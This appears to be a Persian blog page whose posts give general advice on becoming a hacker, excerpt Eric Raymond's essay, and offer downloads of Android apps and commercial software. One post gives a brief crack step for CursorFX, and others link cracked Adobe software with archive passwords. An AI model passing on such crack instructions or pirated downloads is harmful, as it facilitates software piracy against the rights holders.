فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :

• توانایی تحلیل الگوریتم های رمزنگاری ناشناخته
• توانایی برنامه نویسی و نوشتن ابزارهای شکستن رمز

باز هم متذکر میشوم که اینها مواردی است که ما نام برده ایم و شاخه های بسیار زیاد دیگری مانند mobile و .. نیز وجود که کلیاتی مشابه یکی از این شاخه های توضیح داده شده را در خود دارند

با توجه به موارد ذکر شده پس بعد از فراگیری کلیات باید یک شاخه را انتخاب کنید و در آن شاخه به صورت تخصصی فعالیت کنید و اگر احساس میکنید در یک زیر شاخه ی تخصصی حرفه ای هستید
میتوانید زیر شاخه ی و یا شاخه دیگری را شروع کنید, به هیچ وجه تلاش نکنید که همه را با هم یاد بگیرید و کار تیمی رو از یاد نبرید !

پس در پایان یک جمع بندی میکنیم .


1- ابتدا 7 مورد جامع را فرا میگیرد
2- بعد از فراگیری یک تخصص انتخاب کرده و آن را فرا میگیرد
3- بعد از کسب مهارت های لازم در تخصص خود میتوانید تخصص دیگری را نیز فرا بگیرید.


نکته 1 : یادگیری صحیح موارد ذکر شده میتواند مصادف با جوانی شما بگردد پس این کار را به عنوان حرفه و شغل نگاه کنید نه تفریح .
نکته 2 : سعی کنید بعد از فراگیری هر قسمت بتوانید از آن در آمد داشته باشید , در آمد از طریق این راه شما را مشتاق تر و حرفه ای تر میکند.
نکته 3 :در طول این راه طویل بارها و بارها خسته میشوید اما هر زمانی که احساس کردید در یک پروژه راهی وجود ندارد بار دیگر تلاش کنید در هکینگ try harder یک اصل است.

ka30r بازدید : 176 پنجشنبه 1392/05/03 نظرات (0)

در دنیای امروز هک چیست و هکر کیست ؟

به هرگونه نفوذی به هر سخت افزار و نرم افزار که باعث ایجاد اختلال سرقت اطلاعات , تغییر عملکرد و ...انجام شود هک گفته میشود و هگینگ به هیچ وجه تنها مختص به رایانه نمیشود !
هکر شدن در دنیای امروز کاملا معنی متفاوتی دارد و اسامی آبرومندانه تری مانند Ethical Hacker , Penetration Tester , Security Researcher , Computer Security Specialist و ... را به خود گرفته است که کمی محترمانه تر باشد
اما در انواع و اقسام اسامی مختلفی که برای هکرها استفاده شود, این اسامی تنها در چهارچوب و قالب جدیدتری به هکینگ میدهند.

درست است که تنها 11 سال از مقاله ای که اریک نوشته است میگذرد اما دنیای حال حاضر هکینگ دنیایی کاملا متفاوت است در تاریخی که ما در آن قرار داریم علوم امنیت و ضد امنیت اطلاعات
بسیار پیشرفته کرده اند و دارای انواع و اقسام زیر شاخه ها هستند به نحوی که دیگر یک فرد نمیتواند مانند گذشته یک متخصص تمام عیار در تمام شاخه های این موضوع باشد. بنابراین از همین ابتدای کار بدانید که
اگر متخصص یک یا در نهایت چند موضوع باشید بهتر از این است که از هر شاخه ای فقط کمی بدانید در این علوم یک دریاچه ی عمیق بودن خیلی بهتر از یک اوقیانوس با عمق 3 سانت است !


در دنیایی هکر ها به انواع هکر انواع رنگ کلاه را ارتباط میدهد .
هکر کلاه سیاه (blackhat) : این نوع هکر تنها به فکر نفوذ است و زیاد به قانون اهمیت نمیدهد و معمولا مهارت بالایی دارد.
هکر کلاه سفید (whitehat) : هکری که از دانش خود برای امن سازی سیستم ها و تشخیص نفوذ استفاده میکند
هکر کلاه خاکستری (grayhat) : هکری که بهتر است بگوییم هر جا پول باشد همانجا است ! گاهی با امن سازی و گاهی با نفوذ
هکر کلاه صورتی (pink) : هکر کلمه ی مناسبی برای این گروه نیست افرادی که با استفاده از انواع ابزار و آسیب پذیری عمومی با تخریب نرم افزار ها و سایت ها خود را هکر جلوه میدهند و سعی بر کسب شهرت دارند.


چگونه میتوان هکر شد ؟

با توجه به توضیحاتی که داده شد هکر شدن به معنی متخصص شدن در تمام امور مرتبط به رایانه در حدی که بتوان به هر نوع سیستمی نفوذ کرد تقریبا غیر ممکن است پس بهتر است بدانید دقیقا میخواهید چه کاره شوید
اما یک کلیات یکسان در تمامی تخصص ها وجود دارد که باید به حد کافی آنها را بدانید من در اینجا ابتدا کلیات یکسان را می نویسم و سپس تک تک تخصص های جامع را برسی میکنم.

به صورت کلی هر کسی به شاخه های امنیت و ضد امنیت اطلاعات علاقه مند است بهتر است با موارد زیر آشنایی داشته باشد

1- سیستم عامل های مختلف : فهم عمیق ویندوز و لینوکس ضروری هستند ولی بهتر است با دیگر سیستم عامل ها مانند MAC , BSD , و ... (حتی سیستم عامل های موبایل مانند Android , IOS) آشنا باشید , سیستم عامل های ویندوز XP و ویندوز 7 و توضیع لینوکس Backtrack برای شما بسیار مفید و کاربردی خواهند بود.

2- شبکه : مهم نیست میخواهید در چه زمینه ای فعالیت کنید اما بدانید که برای هر گونه فعالیت که قرار است نفوذی در آن انجام شود معمولا یک ارتباط وجود دارد و این ارتباط شبکه ای است Network+ برای شروع کافی است.

3- برنامه نویسی : فهم و درک برنامه نویسی برای هر فردی که میخواهد در این راستا کار کند ضروری است مهم نیست با چه زبانی برنامه نویسی میکنید اما باید یک زبان برنامه نویسی را بدانید پایتون یک گزینه ی فوق العاده است.

 

فایل های پیوست:

>> می توانید برنامه "پاپتون" را از اینجا دانلود کنید با لینک مستقیم.(کلیک)

>> آموزش نصب پاپتون (لینک مستقیم)

>> کتاب آموزش برنامه نویسی به زبان پاپتون

4- زبان انگلیسی : زبان انگلیسی زبان بین المللی میان انسانها و هکرها است و اکثر منابع مفید برای این کار به این زبان نوشته شده اند اگر زبان ندانید با مشکلات فراوانی برخورد خواهید داشت.

5-کار عملی : کار عملی بسیار مهم است بعد از اینکه مطلبی را مطالعه کردید و آموختید حتما آن را امتحان کنید یک جمله ی معروف : میگوید من شنیدم و فراموش کردم , من دیدم و به خاطر سپاردم , من انجام دادم و فهمیدم پس هر چیزی را که میخوانید و احساس میکنید مفید است تست کنید !

6- کار تیمی : این یکی بسیار مهم است اگر یاد نگیرید که تیمی کار کنید و وظایف را تقسیم کنید به سرعت خواهید مرد ! در طول سالهای گذشته و تا امروز و تا آینده ,


7- اشتراک : بهتر است دانش خود را به جا به اشتراک بگذارید تا دیگران نیز دانش خود را با شما به اشتراک بگذارند !

وقتی همه ی این 7 مورد را به اندازه ی کافی بدانید شما آماده هستید هر تخصصی از هکینگ را که دوست داشته باشید فرا بگیرید. البته سعی کنید موارد را واقعا یاد گرفته باشید .

چرا گه همانگونه که استیون هاوکینز میگوید بزرگترین دشمن آگاهی؛ جهل نیست بلکه توهم اینست که می دانیم ! که در جامعه ی متاسفانه ایران بیشتر صدق میکند این مطلب .

ka30r بازدید : 190 پنجشنبه 1392/05/03 نظرات (0)

دوستان پیشنهاد می کنم برای مقدمه کار از ادامه مطلب برای خواندن مقاله چگونه هکر شویم از اریک ریموند اقدام کنید ، کمک می کنه تا بیشتر به حاشیه کار نروید.

اریک ریموند (Eric Steven Raymond) می‌گوید: چگونه یک هکر شویم؟
هکر (hacker) چیست؟

پرونده اصطلاحات(Jargon File) شامل تعاریفی‌از’ هکر’ است که عموما در ارتباط با تعریف تکنیکی‌آن همراه با وصف سرخوشی‌حل مشکلات و مرتفع کردن محدودیت هاست. اگر شما می‌خواهید بدانید چگونه هکر شوید تنها دو تعریف به دردتان می‌خورد.

یک اجتماع ، یک فرهنگ مشترک ، از برنامه نویسان خبره و جادوگران شبکه که پیشینه آن از میان دهه ها به مینی‌کامپیوترهای‌اشتراک زمانی (time-sharing) و اولین تجریه های ‌ARPAnet می‌رسد. اعضای این فرهنگ اصطلاح ‘ هکر’ را ساختند . هکرها اینترنت را ایجاد کردند. آنان سیستم عاملUnix را آنچنان که امروز هست ایجاد کردند. هکرها usenet را اجرا کردند. آنان باعث شدند شبکه جهانی (World wide web) کار کند. اگر شما دارای این فرهنگ هستید و دیگران می‌دانند که شما چه کسی‌هستید و هکر می‌نامندتان؛ پس شما هکر هستید!

نگرش هکر محدود به ‘هکرنرم‌افزار’ نمی‌شود ، مردمانی‌هستند که منش هکر را به سایر زمینه ها مانند الکترونیک یا موسیقی‌سرایت می‌دهند. در حقیقت شما می‌توانید این فرهنگ را در بالاترین سطوح هر علم و هنری بیابید. هکرهای نرم‌افزار این هم روحان را در هر جا می‌شناسند، آنان را ‘هکر ‘ می‌نامند و برخی‌معتقدند که طبیعت هکر واقعا مستقل از زمینه ایست که او در آن کار می‌کند. اما در تمام این مقاله ما بطور خاص بر مهارت ها و منش های‌هکر نرم‌افزار، و فرهنگ های مشترکی که واژه ی ‘هکر’ را بوجود آورد تمرکز خواهیم کرد.

 

ادامه مطلب 

ka30r بازدید : 120 پنجشنبه 1392/05/03 نظرات (0)

سلام دوستای عزیزم دوستان در این جا قرار شده آموزش هک رو از مقدماتی تا پیشرفته برای شما عزیزان قرار بدم! دوستانی که سوالی دارند لطفاً در این قسمت هیچ سوالی نپرسید و برای پرسش سوال خود یا اینجا مراجعه کنید و یا برای بنده پیام خصوصی بدهید! در این تاپیک سعی می کنم بهترین و جدید ترین روش های هک رو برای شما قرار دهم! آموزش های جماوری شده از سایت ها و کتاب های هک و امنیت! با تشکر از همرای شما دوستان عزیز! لطفاً اگر از مطالب خوشطون اومد نظر یادتون نره!

موفق و پیروز باشید

ka30r بازدید : 127 چهارشنبه 1392/04/26 نظرات (0)


دانلود بازی جدید و متفاوت با عنوان Fly Cargo 1.0 برای آندروید

به شما پیشنهاد میکنیم اگر به دنبال سرگرمی با گیم پلی متفاوت و جدید هستید در این مطلب با ما همراه باشید. Fly Cargo عنوان بازی است که امروز قصد معرفی آن را به شما داریم. شما در این بازی نقش هدایت کننده یک هلی کوپتر کوچک اما قدرمتند را بر عهده دارید که باید با مهارت ها و تکنیک های خاص خلبانی از موانع با کمترین درصد آسیب گذر کرده و محموله های جایگذاری شده را به محل متخص به خود انتقال دهید و به راه خود در مدت زمان تعیین شده نیز پایان دهید. مراحل و محیط های متنوع و زیبا, کیفیت و صدا گذاری, تنوع محیط و رنگ بندی, گیم پلی و… از دیگر ویژگی های این بازی میباشد.

 

تصاویری از محیط این بازی:


ka30r بازدید : 167 چهارشنبه 1392/04/26 نظرات (0)


دانلود بازی عبور از خط قرمز برای اندروید Redline Rush v1.2.1

بیش از 8 خودرو اسپرت در یک بازی هیجان انگیز به نام Redline Rush به شما امکان آنرا میدهد تا مهارت های رانندگی خود را به نمایش بگذارید. رد کردن ترافیک سنگین و فرار از پلیس می تواند ماهر ترین گیمر های مسابقه رالی را به چالش بکشد. این بازی را میتوانید به صورت کاملآ رایگان از وب سایتایرنیان دانلود دریافت نمایید.
تصاویری از محیط این بازی:

دانلود بازی عبور از خط قرمز برای اندروید Redline Rush v1.2.1

حداقل سیستم مورد نیاز:
اندروید 2.2 و بالاتر
راهنمای نصب بازی:
1 – با اجرای فایل Redline.Rush.v1.2.1.apk به نصب بازی بپردازید.
2 – بعد از نصب، فایل دیتا بازی را که دانلود کرده اید از حالت فشرده خارج کنید.
3 – پوشه ی com.crescentmoongames.redline_rush را در مسیر SDcard/Android/Obb/ کپی کنید.
4 – بازی را اجرا کنید.

.:: دانلود بازی ::.


.:: دانلود فایل دیتا بازی ::.


ka30r بازدید : 222 چهارشنبه 1392/04/26 نظرات (0)

تغیر شکل نشانگر ماوس با CursorFX 2.01

Stardock CursorFX یکی دیگر از نرم افزارهای زیباساز می باشد که قادر است تا شکل نشانگر موس را تغییر دهد. البته این قابلیت در خود ویندوز نیز قرار دارد اما نشانگرهای پیش فرض ویندوز چندان جالب و کاربر پسند نمی باشد از همین رو این نرم افزار جایگزینی بسیار مناسب برای نشانگرهای پیش فرض ویندوز به شمار میرود. شما با کمک این نرم افزار تنها با یک کلیک قادر خواهید بود تا نشانگر موس را تغییر دهید. همچنین در این نرم افزار نشانگرهای بسیار زیادی قرار دارد که پاسخگوی سلیقه های مختلف کاربران میباشد. امکان اضافه نمودن افکت های صدا و تصویر و همچنین قابلیت طراحی نشانگر به سلیقه کاربر از جمله ویژگی های بسیار خوب این برنامه است.

 

برخی از ویژگی های این برنامه:

دارا بودن صد ها نشانگر موس با شکل های مختلف
قابلیت تغییر و زیباسازی نشانگر موس
قابلیت طراحی نشانگر به سلیقه کاربر
سازگار با ویندوز های ۹۸/۲۰۰۰/XP/Vista/7
حجم مناسب
و …

http://www.dl.ir-dl.com/pic/dl2.jpg

http://dl.ir-dl.com/user21/Pic/16.45.jpg

روش کرک:

فایل Patch موجود در پوشه ی کرک را اجرا نموده و آیکون نرم افزار را به آن آدرس دهی نمایید.

    ka30r بازدید : 114 چهارشنبه 1392/04/26 نظرات (0)


    MiniTool Power Data Recovery 6.6 نرم افزاری سودمند و کاربری آسان جهت بازیابی فایلها برای کاربران خانگی می باشد. این نرم افزار قدرتمند نه تنها فایلهای حذفی شما را بر می گرداند بلکه به کمک این نرم افزار می توانید فایلهایی را که از درایورهایی که قبلاً خراب شده بودند یا ساخت مجدد یافته اند را بازیابی کنید. این نرم افزار نیز قابلیت بازگردانی فایلهای مموری های گوشی و دوربین ها، فلش مموری ها و… را دارد.

     

    MiniTool Power Data Recovery بازيابي اطلاعات آسان با MiniTool Power Data Recovery 6.6 قابل حمل

     

     

    قابلیت های کلیدی نرم افزار MiniTool Power Data Recovery:
    - بازگرداندن اطلاعاتی که اتفاقی پاک شده اند
    - بازگرداندن اطلاعاتی که فرمت شده اند
    - بازگرداندن اطلاعاتی که با عوض شدن Fat درایو پاک شده اند
    - بازگرداندن اطلاعات بعد از fdisk
    - بازگرداندن اطلاعاتی که بر اثر ضربه به هارد از بین رفته اند
    - بازگرداندن اطلاعات از انواع هاردها، کارت دوربین های دیجیتال، USB درایوها و دیسکهای فلاپی و …
    - و ….

     

     

    password بازيابي اطلاعات آسان با MiniTool Power Data Recovery 6.6 قابل حملپسورد فایل: www.downloadha.com

    download بازيابي اطلاعات آسان با MiniTool Power Data Recovery 6.6 قابل حمل لینک دانلود – 10 مگابایت | لینک کمکی

     

    منبع : www.downloadha.com

    ka30r بازدید : 191 چهارشنبه 1392/04/26 نظرات (0)

    Adobe Audition یکی از پیشرفته ترین نرم افزارهای ساخت و ویرایش آهنگ در دنیا می باشد. این نرم افزار محصولی از شرکت مشهور Adobe است که در زمینه ساخت نرم افزارهای مالتی مدیا از شهرت جهانی برخوردار است. این برنامه دارای ابزارهای بسیار حرفه ای آهنگسازی می باشد به طوری که می توان آنرا به یک استدیو مجازی ساخت آهنگ تشبیه کرد. شما قادرید تا با کمک این نرم افزار به راحتی اقدام به ظبط صدا و ویرایش آن کنید و سپس با استفاده از ابزارهای مختلف برنامه اقدام به تنظیم صدا بر روی آهنگ مورد نظرتان کنید. به عبارت دیگر ابزارهای این نرم افزار را می توان به چند بخش ظبط, ویرایش, تدوین, رندر, تنظیم, میکس و … تقسیم بندی کرد که هر یک از آنها در مراحل مختلف ساخت آهنگ مورد نظرتان به شما کمک می کنند. همچنین در این برنامه افکت های صوتی متنوعی قرار گرفته است که می توانید از آنها در هنگام ساخت آهنگ ها استفاده کنید. علاوه بر این نویزگیر نیز یکی دیگر از ویژگی های این نرم افزار است که به منظور حذف نویز از آهنگ های با کیفیت پایین مورد استفاده قرار میگیرد. جدید ترین نسخه این نرم افزار یعنی CS5.5 دستخوش تغییرات بسیار زیادی بوده که شامل بهبود عملکرد ابزارهای آهنگسازی, بهبود عملکرد ابزار حذف صدای خواننده از روی آهنگ, اضافه شدن افکت های جدید صوتی, سازگاری بهتر برنامه با سایر نرم افزاهای شرکت ادوب, پشتیبانی از فرمت های صوتی جدید و امکان ذخیره سازی آهنگ های ساخته در این فرمت ها و … می باشد. کار با این نرم افزار برخلاف نرم افزارهای مشابه چندان پیچیده نیست زیرا ابزارها به شکلی ساده در اختیار کاربر قرار دارد به طوری که اگر شما برای اولین بار بخواهید با این برنامه کار کنید اصلآ در پیدا کردن ابزارهای مورد نظرتان دچار مشکل نمی شوید. یکی دیگر از ویژگی هایی که در نسخه جدید این برنامه به چشم می خورد افزیش سرعت نصب و همچنین افزایش سرعت در محیط آن است به طوری که در مقایسه با نسخه های قدیمی سرعت کار در محیط برنامه چند برابر شده است. این نرم افزار را می توانید به صورت کاملآ رایگان از وب سایت بزرگ دانلودها دریافت نمایید.

     

    برخی از ویژگی هی این نرم افزار:

    امکان ادیت, رندر, تنظیم, تدوین و میکس آهنگ ها
    سازگاری کامل با سایر نرم افزارهای شرکت ادوب
    دارا بودن ابزارهای بسیار پیشرفته آهنگسازی
    قابلیت ساخت و ویرایش حرفه ای آهنگ ها
    قابلیت حذف صدای خواننده از روی آهنگ
    قابلیت بریدن قسمت دلخواه از آهنگ
    دارا بودن افکت های متنوع صوتی
    قابلیت ترکیب چند آهنگ با یکدیگر
    سازگار با ویندوز های ۹۸/۲۰۰۰/XP/Vista/7
    حجم مناسب
    و …

     


    password ساخت و ویرایش حرفه ای آهنگ ها با نرم افزار Adobe Audition CS5.5 4.0پسورد فایل: www.downloadha.com

    download ساخت و ویرایش حرفه ای آهنگ ها با نرم افزار Adobe Audition CS5.5 4.0لینک دانلود – 126.3 مگابایت | لینک کمکی

     

    منبع www.downloadha.com

    ka30r بازدید : 129 چهارشنبه 1392/04/26 نظرات (0)

    Adobe Dreamweaver یکی از پیشرفته ترین نرم افزارهای طراحی و ساخت سایت در دنیا می باشد. این نرم افزار محصولی از شرکت مشهور Adobe است که در زمینه ساخت نرم افزارهای طراحی از شهرت جهانی برخوردار است. با این برنامه شما میتوانید به آسانی یک سایت بسازید. در واقع این نرم افزار متشکل از ابزارهای متنوع طراحی سایت می باشد که توسط آنها میتوان اقدام به طراحی قسمت های مختلف صفحات یک سایت نمود. افرادی که به صورت حرفه ای در زمینه طراحی سایت ها کار می کنند به راحتی می توانند با کد نویسی در محیط این برنامه اقدام به ساخت سایت مورد نظرشان کنند. همچنین افرادی که تخصص چندانی با برنامه نویسی وب ندارند نیز می توانند از این برنامه برای طراحی سایت ها استفاده کنند زیرا این نرم افزار دارای بخشی است که شما بدون کد نویسی نیز میتوانید اقدام به طراحی قسمت های مختلف سایت مورد نظرتان کنید. این برنامه از زبان های مختلف برنامه نویسی وب نظیر HTML, XHTML, CSS, XML, JavaScript, Ajax, PHP, Adobe ColdFusion, ASP, ASP.NET پشتیبانی می کند و با ارائه محیطی کاملآ حرفه ای برای کد نویسی به کاربران این امکان را می دهد که به آسانی اقدام به نوشتن کدهای مورد نظرشان برای ساخت سایت کنند. جدید ترین نسخه این نرم افزار یعنی CS5.5 دستخوش تغییرات بسیار زیادی بوده که شامل بهبود عملکرد ابزارهای ویرایش و طراحی صفحات وب, امکان خطایابی دقیق کدها, اضافه شدن ابزارهای جدید طراحی سایت, سازگاری بهتر برنامه با سایر نرم افزاهای شرکت ادوب, امکان جدید آپلود و ویرایش مستقیم سایت, پشتیبانی از تمام فایل های موجود در صفحات وب, اضافه شدن ابزارهای ویرایش جدید و … می باشد. کار با این نرم افزار برخلاف نرم افزارهای مشابه چندان پیچیده نیست زیرا ابزارها به شکلی ساده در اختیار کاربر قرار دارد به طوری که اگر شما برای اولین بار بخواهید با این برنامه کار کنید اصلآ در پیدا کردن ابزارهای مورد نظرتان دچار مشکل نمی شوید. همچنین از امکانات دیگر این برنامه پشتیبانی از انواع سیستم های مدیریت محتوا سایت ها مانند وردپرس است که به کاربران این نوع سیستم ها این امکان را می دهد که اقدام به ویرایش سایت های مبنی بر این نوع سیستم ها کنند. یکی دیگر از ویژگی هایی که در نسخه جدید این برنامه به چشم می خورد افزیش سرعت نصب و همچنین افزایش سرعت در محیط آن است به طوری که در مقایسه با نسخه های قدیمی سرعت کار در محیط برنامه چند برابر شده است. این نرم افزار را می توانید به صورت کاملآ رایگان از سایت بزرگ دانلودها دریافت نمایید.

     

    برخی از ویژگی های این نرم افزار قدرتمند:
    قابلیت ویرایش مستقیم صفحات وب
    سازگاری کامل با سایر نرم افزارهای شرکت ادوب
    پشتیبانی از انواع سیستم های مدیریت محتوا
    امکان طراحی و ساخت حرفه ای صفحات وب
    پشتیبانی از انواع زبان های برنامه نویسی
    بامکان طراحی سایت بدون کد نویسی
    امکان خطا یابی دقیق کدها
    سازگار با ویندوز های ۹۸/۲۰۰۰/XP/Vista/7
    حجم مناسب
    و …

     

     

    password طراحی و ایجاد حرفه ای سایت با نرم افزار Adobe Dreamweaver CS5.5 11.5

    پسورد فایل: www.downloadha.com

    download طراحی و ایجاد حرفه ای سایت با نرم افزار Adobe Dreamweaver CS5.5 11.5 لینک دانلود – 389.9 مگابایت | لینک کمکی

     

    منبع : www.downloadha.com

     

    ka30r بازدید : 139 شنبه 1392/04/22 نظرات (0)

    http://www.cell11.com/android/wp-content/uploads/2013/06/Simple-Unrar.jpg


    از ویژگی های موجود در نسخه فعلی -
    1. استخراج فایل های RAR.
    2. نمایش اطلاعات فایل RAR.
    3. استخراج فایل اس ام اس چشمک رمز محافظت شده است.
    4. استخراج آرشیو های چند قسمتی RAR.
    5. نمایش فایل های موجود در آرشیو است.
    6. استخراج فایل های انتخاب شده از آرشیو.
    7. استخراج فایل های در پوشه انتخاب شده.
    8. مرورگر فایل کوتاه.
    9. برای گزینه بخواهید اگر فایل وجود داشته باشد (تنظیمات - بله (بازنویسی)، نه، همه، هرگز، تغییر نام، تغییر نام)
    10. نمایش نظر RAR در صورت وجود.
    11. می توانید نگه دارید شکسته / فایل های خراب.
    12. پشتیبانی از یونیکد.
    13. پشتیبانی از فایلهای بزرگ (بزرگتر از 2GB).
    14. قابلیت جستجوی.
    15. باز کردن / استخراج اس ام اس چشمک به طور مستقیم از ضمیمه ایمیل.
    16. پشتیبانی نسخه های Rar 5.

    تمام ویژگی های کاملا رایگان.

    این نرم افزار کار در حال پیشرفت است. از ویژگی های بیشتر افزوده خواهد شد و اشکالات ثابت خواهد شد. بنابراین اگر شما هر گونه اشکالات و یا نشان می دهد هر گونه ویژگی های احساس رایگان به من ایمیل. نظر شما به این نرم افزار کمک خواهد کرد که این نرم افزار بهتر و بهتر. و صبور در حالی که من اضافه کردن ویژگی های جدید و رفع اشکالات.

    *** این نرم افزار توسط تبلیغات پشتیبانی می کند. ***
    *** آیکون ها و گرافیک های موجود در نرم افزار را از منابع مختلف جمع آوری می شود. اعتبار می رود به همه آنها. ***

    برای دانلود کلیک کنید


    ka30r بازدید : 131 شنبه 1392/04/22 نظرات (0)
    http://www.cell11.com/android/wp-content/uploads/2013/06/RMaps.jpg
    RMapsیک ابزار ناوبری و آفلاین که با این نسخهها کار میکند
    نقشه های گوگل (شامل ماهواره و زمین)
    MapQuest
    باز خیابان نقشه ها (استاندارد، چرخه، حمل و نقل و غیره ...)
    Cloudmade
    نقشه های مایکروسافت
    یاندکس (روسیه)
    Freemap (اسلواکی)
    Statkart (نروژ)
    نقشه های IFR و VFR
    آدرس های اینترنتی سفارشی
    و همچنین بسیاری دیگر.
    بسیاری از ویژگی های بزرگ از جمله: جستجو، پیگیری خودرو، چرخش اتوماتیک، POIs، نقشه آنلاین، نقشه های سفارشی، قطب نما ...
    دانلود با لینک مستقیم....
    برای دانلود کلیک کنید
    ka30r بازدید : 128 شنبه 1392/04/22 نظرات (0)

     

    http:///images/78960186967683139651.jpg

    قران آندروید برای تمامی ورژن ها با لینک مستقیم...

    - قرائت صوتی در دسترس برای پخش و دانلود با برجسته پشتیبانی (شیر روی صفحه نمایش برای دریافت نوار ابزار های صوتی) هستند.
    - جستجو
    - بتا: حالت شب
    - بتا: تکرار صوتی
    - شفاف تصاویر مدنی سازگار است.
    - زیبا و اثر گذار صفحه صاف.
    - با این نسخهها کار بر روی تلفن های آندروید بدون حمایت عربی.
    - حالت افقی برای فونت ها و حتی بزرگتر و راحت تر مشاهده تصویر.
    - نشانه از تعداد نامحدودی از صفحات (شیر روی صفحه نمایش برای پیدا کردن دکمه نشانه).
    - ترجمه در زبان های مختلف (در حال حاضر، تفسیر عربی، انگلیسی صحیح ترجمه بین المللی، فرانسوی، آلمانی، اندونزیایی، مالزیایی، اسپانیایی، ترکی، نویسه گردانی، بوسنیایی، روسی، بنگالی، کردی، سومالی، هلندی، سواحیلی، مالایایی، آذربایجان، تامیل و اردو) با بیش به زودی.

    برای دانلود کلیک کنید

    درباره ما
    این سایت جهت برقراری ارتباط با کارآموزان دانشگاه دیباگران حر طراحی شده و کارآموز می تواند تمامی مطالب گفته شده در کلاس را در این سایت بیابد . در ضمن تمامی مشخصات دانش آموز در همین سایت آپلود شده و در دسترس تمامی کارآموزان عزیز قرار می گیرد. با تشکر ka30r
    اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    آمار سایت
  • کل مطالب : 85
  • کل نظرات : 0
  • افراد آنلاین : 2
  • تعداد اعضا : 46
  • آی پی امروز : 14
  • آی پی دیروز : 6
  • بازدید امروز : 70
  • باردید دیروز : 8
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 128
  • بازدید ماه : 357
  • بازدید سال : 2,646
  • بازدید کلی : 40,112
  • دانلود نرم افزار کاربردی
    لیست دانلود نرم افزار  "رایگان "
    دانلود IDM 
    آپدیت شده در 4 مرداد
    دانلود ویندوز 8 و 7 و XP 
    آپدیت شده در 8 مرداد
    محصولات Adobe 
    آپدیت شده در 2 تیر
    محصولات Autodesk 
    آپدیت شده در 21 تیر
    دانلود مرورگر موزیلا 
    آپدیت شده در 4 تیر
    مرورگر اينترنت اكسپلورر 
    آپدیت شده در 3 مرداد
    دانلود Google Chrome 
    آپدیت شده در 8 مرداد
    مرورگر Opera 
    آپدیت شده در 26 تیر
    دانلود یاهو مسنجر 
    آپدیت شده در 11 خرداد 91
    دانلود Winrar 
    آپدیت شده در 25 خرداد 91
    دانلود Winamp 
    آپدیت شده در 2 مرداد
    پلیرهای محبوب 
    آپدیت شده در 4 تیر
    محصولات Nero 
    آپدیت شده در 6 خرداد
    محصولات ESET 
    آپدیت شده در 14 اردیبهشت
    محصولات Kaspersky 
    آپدیت شده در 8 مرداد
    محصولات مکافی 
    آپدیت شده در 3 بهمن
    محصولات نورتون 
    آپدیت شده در 28 خرداد
    محصولات Avira 
    آپدیت شده در 1 مرداد
    محصولات Avast 
    آپدیت شده در 19 اردیبهشت
    محصولات BitDefender 
    آپدیت شده در 18 خرداد
    محصولات AVG 
    آپدیت شده در 8 مرداد
    Foxit Reader مشاهده PDF 
    آپدیت شده در 7 مرداد
    محصولات Xilisoft 
    آپدیت شده در 18 تیر
    محصولات Magix 
    آپدیت شده در 6 مرداد
    محصولات Wondershare 
    آپدیت شده در 29 اردیبهشت
    محصولات Ashampoo 
    آپدیت شده در 4 مرداد
    TuneUp Utilities 
    آپدیت شده در 19 بهمن
    محصولات AVS 
    آپدیت شده در 20 تیر
    محصولات CyberLink 
    آپدیت شده در 22 تیر
    Firewall App Blocker 
    آپدیت شده در 2 مرداد